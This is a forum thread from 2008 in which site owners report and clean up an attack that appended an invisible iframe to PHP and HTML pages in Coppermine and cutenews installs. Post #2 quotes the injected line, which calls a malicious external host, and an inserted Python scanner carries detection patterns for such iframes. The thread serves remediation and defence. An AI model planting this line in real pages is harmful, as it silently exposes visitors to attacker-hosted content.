#1 (permalink)
Registered User
Fresh Surpasser
Joined in Apr 2008
1 posts
Gave thanks: 0
Thanked 0 times

Anyone else had the 'cdpuvbhfzz' attack yet?
Hi everyone, there's a new hack at work which has already taken down quite a few sites (mine included). It's inserting an iframe code into all php and html pages on servers and it's trying to re-direct people to cdpuvbhfzz.com (DON'T GO TO THAT SITE). I was wondering if anyone else is having this problem or if a solution has been found? There's more info about it here: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
My gallery, forum and cutenews have all been affected. I wasn't sure if this was the right place to post this, but since it seems to be finding a way in through php files I thought it was the best place. I'm no whiz when it comes to php, so if anyone has some suggestions I'd love to hear them cos I'm way out of ideas.

#2 (permalink)
Registered User
Seasoned Poster
Joined in Dec 2004
Lives in Buffalo, NY
Hosted on Pass22
34 posts
Gave thanks: 0
Thanked 0 times

It just happened to me this morning. They added this iframe to the bottom of practically every file:
Code:
<?php echo '<iframe src="http://cdpuvbhfzz.com/dl/adv598.php" width=1 height=1></iframe>'; ?>

#3 (permalink)
Registered User
Seasoned Poster
Joined in Dec 2004
Lives in Buffalo, NY
Hosted on Pass22
34 posts
Gave thanks: 0
Thanked 0 times

I think this might have something to do with Coppermine, read this thread:
Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

#4 (permalink)
Registered User
Fresh Surpasser
Joined in May 2006
2 posts
Gave thanks: 0
Thanked 0 times

Oh, it's happened to mine. The folks at Surpass have been trying to help but have only managed to restore the forum. Having continued to do research or had help from outside influence, I've discovered that even upgrading Coppermine doesn't always fix the problem. I've taken it offline and fear that only fresh installs might be the answer, though I'm hoping for a miracle at this point. My website has been infected since the 7th, when I first reported the problem to Surpass.
And in case you're wondering, no, replacing the files does not work. There is a file that is continuing to add the iframe. Once that is gone, that should do it. But the trouble is finding that said file. And once you do, will just deleting the iframe code be enough? And will some files be able to take that? Surpass seems to indicate to me that just deleting it isn't the answer. Though, I've been back and forth with them since the 7th and have had better luck looking at what the folks at Coppermine are saying along with programmer friends. Not saying Surpass can't fix this, just saying that as the situation stands, it's not getting much better. (They did manage to fix the forum though.)

#6 (permalink)
Registered User
Fresh Surpasser
Joined in Jan 2007
4 posts
Gave thanks: 0
Thanked 0 times

Hmm, not sure why I can't edit my above post (there's no link), but anyway, the php problem had to do with the cutenews update. So while I deleted all of the bugs, I downgraded it back to 1.4.5 until I can figure out why 1.4.6 screwed up my php pages.
Anyways, for those whose Coppermine galleries were affected, download the update, but first go into your /coppermine/albums/userpics/ folder. There should be a 142739_298w3.jpg/zip/php file. Delete that! Also go into your gallery's config page, and delete that direct to the "custom header" (it will point to the userpics/10001/142739_298w3.jpg file). Your cutenews infected files are in the data folder. I went through all of the php files and deleted out the <iframe> code. Also, my comments.txt file was also spammed, so if you want to keep your current comments, you may have to manually go through that (the spam comments were all at the end of the file).
Last edited by ange1; April 12th, 2008 at 7:28 AM.

#7 (permalink)
Registered User
Fresh Surpasser
Joined in May 2006
2 posts
Gave thanks: 0
Thanked 0 times

To add to what was just posted above, this is certainly what seems to be the problem for most. However, I encountered some other problems! In each userpic album I found an index.html file that had the offending iframe attack. I deleted each and every one of them and it fixed the gallery! Unfortunately, not entirely. The album view is messed up. It only does one file per page. I'm not sure what that is. Does anyone have the answers?
EDIT: Duh is me. I just realized that they changed the settings in the thumbnail view. Once I did that, everything was back to normal!
Last edited by Tao; April 12th, 2008 at 3:37 PM.

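Added example, not written by any poster in this thread: a read-only sweep for the two indicators reported above, the invisible iframe appended to PHP/HTML files (posts #2 and #7) and PHP code sitting in an image- or zip-named upload such as the userpics file from post #6. The function names, the extension lists, the "hidden" heuristic and the placeholder host `injected.example` are assumptions made for this sketch.

```python
import os
import re
import sys

# Assumption: "hidden" = width/height of 0 or 1, or CSS display:none / visibility:hidden.
IFRAME = re.compile(rb"<iframe\b[^>]*>", re.I)
HIDDEN = re.compile(rb"""\b(?:width|height)\s*=\s*["']?[01](?:px)?["'\s>]"""
                    rb"|display\s*:\s*none|visibility\s*:\s*hidden", re.I)
PHP_TAG = re.compile(rb"<\?php", re.I)
PAGE_EXT = {".php", ".html", ".htm", ".inc", ".tpl"}
UPLOAD_EXT = {".jpg", ".jpeg", ".gif", ".png", ".zip"}

# Constructed sample (placeholder host), shaped like the line quoted in post #2.
SAMPLE = b"<?php echo 'ok'; ?>\n<?php echo '<iframe src=\"http://injected.example/x.php\" width=1 height=1></iframe>'; ?>\n"

def hidden_iframes(data):
    """Return (line_number, tag) for each iframe tag sized or styled to be invisible."""
    hits = []
    for m in IFRAME.finditer(data):
        if HIDDEN.search(m.group(0)):
            line = data.count(b"\n", 0, m.start()) + 1
            hits.append((line, m.group(0).decode("latin-1")))
    return hits

def scan(root):
    """Read-only walk of root; returns sorted (relative_path, finding) tuples."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            ext = os.path.splitext(name)[1].lower()
            if ext not in PAGE_EXT | UPLOAD_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rel = os.path.relpath(path, root)
            if ext in PAGE_EXT:
                for line, tag in hidden_iframes(data):
                    findings.append((rel, f"hidden iframe, line {line}: {tag}"))
            elif PHP_TAG.search(data):
                findings.append((rel, "PHP code in an upload-type file"))
    return sorted(findings)

if __name__ == "__main__":
    print(hidden_iframes(SAMPLE))  # self-check on the constructed sample
    for rel, finding in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{rel}: {finding}")
```

The scan changes nothing on disk; each finding is a lead for manual review, and the upload check is aimed at the kind of file post #4 describes as continuing to re-add the iframe.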
#9 (permalink)
Registered User
Seasoned Poster
Joined in Feb 2005
76 posts
Gave thanks: 4
Thanked 2 times

I'm dealing with this today. Right now I've just finished sanitizing the Coppermine installs and now I'm going through upgrading them to the newest version to fix it. ARGH!!!
__________________
SH65 kiextreme.com